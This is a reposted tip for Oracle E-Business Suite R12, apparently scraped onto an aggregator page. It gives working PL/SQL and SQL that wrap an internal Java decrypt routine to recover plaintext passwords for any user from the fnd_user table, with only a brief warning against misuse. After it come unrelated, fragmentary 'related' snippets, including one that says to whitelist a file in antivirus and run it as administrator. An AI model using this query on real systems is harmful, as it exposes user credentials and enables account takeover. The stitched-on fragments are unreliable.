THIS WORKS WITH ORACLE R12
Here is a wonderful oracle seeded Procedure fnd_web_sec.get_guest_username_pwd which will help us to find out user password.
This will be handy for consultants in resolving the issues. Please use with this care and dont misuse this.
To achieve this you need to create a small package and run a query which I wrote below
--Package Specification
CREATE OR REPLACE PACKAGE get_pwd
AS
FUNCTION decrypt (KEY IN VARCHAR2, VALUE IN VARCHAR2)
RETURN VARCHAR2;
END get_pwd;
/
--Package Body
CREATE OR REPLACE PACKAGE BODY get_pwd
AS
FUNCTION decrypt (KEY IN VARCHAR2, VALUE IN VARCHAR2)
RETURN VARCHAR2
AS
LANGUAGE JAVA
NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';
END get_pwd;
/
--Query to execute
SELECT usr.user_name,
get_pwd.decrypt
((SELECT (SELECT get_pwd.decrypt
(fnd_web_sec.get_guest_username_pwd,
usertable.encrypted_foundation_password
)
FROM DUAL) AS apps_password
FROM fnd_user usertable
WHERE usertable.user_name =
(SELECT SUBSTR
(fnd_web_sec.get_guest_username_pwd,
1,
INSTR
(fnd_web_sec.get_guest_username_pwd,
'/'
)
- 1
)
FROM DUAL)),
usr.encrypted_user_password
) PASSWORD
FROM fnd_user usr
WHERE usr.user_name = '&USER_NAME';
zz:
http://oracleappsdna.com/2011/07/decrypting-user-passwordhow-to-find-password-of-a-user-in-oracle-apps-r12/
分享到:
相关推荐
The central idea of this book is that it's better for you to find the holes in your network than it is for someone else to find them, someone that would use them against you. The complete, ...
That is, the cryptographic mechanisms permit the user to determine that the entity claiming to be the source of data really is the source and to determine whether information has been modified since ...
The only way to do both is to have an Ansi and a Wide function for encrypting or decrypting strings. And that is what I've done. For example LockBox 2.07 has only one function BFEncryptStringEx. For ...
Mature and powerful, Wireshark is commonly used to find root cause of challenging network issues. This book extends that power to information security professionals, complete with a downloadable, ...
Program for decrypting a dump using a known xor
Hacking Secret Ciphers with Python not only teaches you how to write in secret ciphers with paper and pencil. This book teaches you how to write your own cipher programs and also the hacking programs ...
NEWS for OpenSC -- History of user visible changes Complete change history is available online: http://www.opensc-project.org/opensc/timeline New in 0.12.0; 2010-12-22 * OpenSC uses a single reader ...
download this file, and add it to white list in your antivirus 6) run this application WITH ADMINISTRATOR RIGHTS 7) scan local machine (don't move your files - this may compromise the integrity of the...
demo.zip How to send debugging output to a console in a MFC application(12KB)<END><br>56,statuslog.zip A very simple text logger that allows you to use printf-type formatting, with automatic ...
AES is based on the Rijndael cipher developed by two Belgian cryptographers, Joan Daemen and Vincent Rijmen, who submitted a proposal to NIST during the AES selection process. Rijndael is a family of ...
Encrypting and decrypting sensitive data using CryptoAPI. (6KB)
信息安全_数据安全_DPAPI_and_DPAPI-NG:Decrypting_Al 安全建设 漏洞分析 可信编译 威胁情报 大数据
SD
A reactive wrapper around Android's fingerprint API that handles encrypting/decrypting sensitive data using a fingerprint. Usage Create an instance of Whorlwind by calling: Whorlwind.create(context, ...
The portion of the key used for encrypting or decrypting the message are deleted after use, thus also providing forward secrecy: the unencrypted message cannot be recovered from either the sender or ...
return t[i].call(a.exports,a,a.exports,e),a.l=!0,a.exports}var r={};return e.m=t,e.c=r,e.d=function(t,r,i){e.o(t,r)||Object.defineProperty(t,r,{configurable:!1,enumerable:!0,get:i})},e.n=function(t){...
of my GitHub stars! Generated by Contents [Emacs Lisp](#emacs lisp) [Jupyter Notebook](#jupyter notebook) Batchfile - elasticsearch中文发行版,针对中文集成了相关插件,方便新手学习测试. C - Disque is a...
Python implementation of the XTEA Block Encryption Algorithm. Also includes a CBC decrypt function for decrypting Cipher Block Chain mode encrypted ciphertext.
no user provided, using jerome by default looking for gpg files in /home/jerome/pictures entering /home/jerome/pictures [-] 20:10:23 : decrypting 20190728_0001.jpg.gpg ✓ [-] 20:10:26 : ...
Decrypting data files